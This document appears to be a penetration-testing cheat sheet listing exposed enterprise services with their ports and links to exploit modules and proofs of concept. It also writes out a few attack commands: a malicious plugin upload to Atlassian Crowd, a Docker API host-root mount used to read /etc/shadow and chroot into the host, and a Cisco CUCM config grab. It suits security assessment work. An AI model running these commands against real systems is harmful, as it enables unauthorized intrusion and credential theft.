# Low-Hanging Fruit

## Services

### Adobe ColdFusion BlazeDS

**Ports:** 8080\
**Exploit:**

{% embed url="https://www.tenable.com/plugins/nessus/99731" %}

{% embed url="https://www.exploit-db.com/exploits/43993" %}

### Apache Flink

**Ports:** 5000\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/http/apache_flink_jar_upload_exec" %}

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal" %}

{% embed url="https://www.exploit-db.com/exploits/48978" %}

### Apache Hadoop

**Ports:** 8088\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/linux/http/hadoop_unauth_exec" %}

{% embed url="https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py" %}

### Apache Solr

**Ports:** 8983\
**Exploit:**

{% embed url="https://github.com/jas502n/solr_rce" %}

{% embed url="https://github.com/Imanfeng/Apache-Solr-RCE" %}

### Apache Spark

**Ports:** 6066\
**Exploit:**

{% embed url="https://github.com/ivanitlearning/CVE-2018-11770" %}

{% embed url="https://www.rapid7.com/db/modules/exploit/linux/http/spark_unauth_rce" %}

### Atlassian Crowd

**Ports:** 4990\
**Exploit:**

```bash
curl -k -H "Content-Type: multipart/mixed" \
  --form "file_cdl=@rce.jar" http://[HOST]:4990/crowd/admin/uploadplugin.action
```

{% embed url="https://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html" %}

### Cisco Smart Install

**Ports:** 4786\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/misc/cisco_smart_install" %}

{% embed url="https://github.com/frostbits-security/SIET" %}

### Cisco Unified Communications Manager

**Ports:** 6970\
**Exploit:**

```bash
curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt
```

{% embed url="https://github.com/trustedsec/SeeYouCM-Thief" %}

### Dameware

**Ports:** 6129\
**Exploit:**

{% embed url="https://www.tenable.com/security/research/tra-2019-43" %}

{% embed url="https://github.com/tenable/poc/blob/master/Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py" %}

### Dell iDRAC

**Ports:** 443\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/http/dell_idrac" %}

### Docker API

**Ports:** 2375\
**Exploit:**

```bash
docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
```

* File Access: `cat /mnt/etc/shadow`
* Remote Code Execution: `chroot /mnt`

### GlassFish

**Ports:** 4848\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/http/glassfish_traversal" %}

### HashiCorp Consul

**Ports:** 8500\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/misc/consul_service_exec" %}

### HP Data Protector

**Ports:** 5555, 5556\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/misc/hp_data_protector_exec_integutil" %}

{% embed url="https://www.rapid7.com/db/modules/exploit/windows/misc/hp_dataprotector_cmd_exec" %}

### HP iLO

**Ports:** 80, 443\
**Exploit:**

{% embed url="https://github.com/skelsec/CVE-2017-12542/blob/master/exploit_1.py" %}

### IBM WebSphere

**Ports:** 8880\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/windows/misc/ibm_websphere_java_deserialize" %}

### IPMI

**Ports:** 623\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_version" %}

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes" %}

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero" %}

### Java RMI

**Ports:** 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server" %}

{% embed url="https://itnext.io/java-rmi-for-pentesters-structure-recon-and-communication-non-jmx-registries-a10d5c996a79" %}

{% embed url="https://itnext.io/java-rmi-for-pentesters-part-two-reconnaissance-attack-against-non-jmx-registries-187a6561314d" %}

### JBoss

**Ports:** 4444, 4445, 11111\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/auxiliary/scanner/http/jboss_vulnscan" %}

{% embed url="https://github.com/joaomatosf/jexboss" %}

### JDWP

**Ports:** 5005-5009, 45000, 45001\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/misc/java_jdwp_debugger" %}

{% embed url="https://github.com/IOActive/jdwp-shellifier" %}

### JMX

**Ports:** 8686, 9012, 50500\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/multi/misc/java_jmx_server" %}

### MS17-010: EternalBlue

**Ports:** 139, 445\
**Exploit:**

```bash
nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip
```

{% embed url="https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/" %}

### Portainer

**Ports:** 9000\
**Exploit:**

{% embed url="https://github.com/MauroEldritch/PAZUZU" %}

{% embed url="https://github.com/MauroEldritch/lempo" %}

### PrintNightmare

**Exploit:**

```bash
crackmapexec smb $host_file -u $username -p $password -M spooler
```

{% embed url="https://github.com/cube0x0/CVE-2021-1675" %}

### Redis

**Ports:** 6379\
**Exploit:**

{% embed url="https://www.rapid7.com/db/modules/exploit/linux/redis/redis_replication_cmd_exec" %}

{% embed url="https://www.rapid7.com/db/modules/exploit/linux/redis/redis_unauth_exec" %}

### SAP

**Ports:** 3300\
**Exploit:**

{% embed url="https://github.com/chipik/SAP_GW_RCE_exploit" %}

### WebLogic

**Ports:** 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503\
**Exploit:**

{% embed url="https://www.exploit-db.com/search?q=weblogic" %}

### Zoho ManageEngine Desktop

**Ports:** 8383\
**Exploit:**

{% embed url="https://srcincite.io/pocs/src-2020-0011.py.txt" %}

### References

{% embed url="https://github.com/trustedsec/spoonmap" %}

{% embed url="https://twitter.com/ptswarm/status/1354417582070247426" %}
